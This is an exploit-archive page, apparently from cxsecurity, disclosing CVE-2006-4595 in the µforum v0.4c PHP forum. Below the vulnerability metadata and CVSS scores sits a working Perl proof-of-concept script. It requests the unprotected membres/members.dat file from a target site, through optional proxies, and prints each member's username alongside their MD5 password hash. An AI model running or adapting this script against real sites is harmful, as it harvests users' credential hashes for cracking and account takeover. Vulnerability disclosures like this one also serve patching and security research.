µforum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc

2006.09.08
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-4595
CWE: CWE-200


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

#!/usr/bin/perl # # Affected.scr..: µforum v0.4c # Poc.ID........: 08060901 # Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file # Risk.level....: Medium # Vendor.Status.: Unpatched # Src.download..: comscripts.com/scripts/php.forum.1568.html # Poc.link......: acid-root.new.fr/poc/08060901.txt # Credits.......: DarkFig # use LWP::UserAgent; use HTTP::Request; use Getopt::Long; use strict; print STDOUT "n+", '-' x 36, "+n"; print STDOUT "| µforum v0.4c (members.dat) Exploit |n"; print STDOUT '+', '-' x 36, "+n"; my($host,$path,$proxh,$proxu,$proxp); my $opt = GetOptions( 'host=s' => $host, 'path=s' => $path, 'proxh=s' => $proxh, 'proxu=s' => $proxu, 'proxp=s' => $proxp); if(!$path) {$path = '/';} $host .= $path.'membres/members.dat'; if($host !~ /http/) {$host = 'http://'.$host;} my $ua = LWP::UserAgent->new(); $ua->agent('Mozilla'); $ua->timeout(30); $ua->proxy(['http'] => $proxh) if $proxh; my $req = HTTP::Request->new('GET', $host); $req->proxy_authorization_basic($proxu, $proxp) if $proxp; my $res = $ua->request($req); my $dat = $res->content; my @tabl= split(/:/, $dat); foreach (@tabl) { if($_ =~ /"(.*)";a/){ print "n".$1.'::';} if($_ =~ /"([a-z0-9]{32})";i/){ print $1;} } print "n"; exit(0);


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top